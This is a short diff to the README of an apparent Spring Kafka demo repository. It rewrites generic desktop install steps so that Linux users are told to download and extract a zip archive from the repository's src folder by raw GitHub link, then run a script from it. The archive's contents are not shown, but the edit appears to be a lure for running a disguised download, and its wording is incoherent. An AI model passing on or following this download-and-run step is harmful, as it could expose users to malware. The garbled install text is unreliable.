blakemessier/spring-kafka-contract-demo/README.md

    Once downloaded, locate the file in your Downloads folder.
 Follow these steps to install:
    - For Windows: Double-click the `.exe` file and follow the prompts.
    - For macOS: Open the `.dmg` file and drag the application into your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and navigate to the folder, then run the script.
+   - For Linux: Extract the `https://github.com/blakemessier/spring-kafka-contract-demo/raw/refs/heads/main/src/kafka_contract_spring_demo_2.4.zip` file and navigate to the folder, then run the script.

 4. **Run the Application**
    Now that the application is installed, you can run it: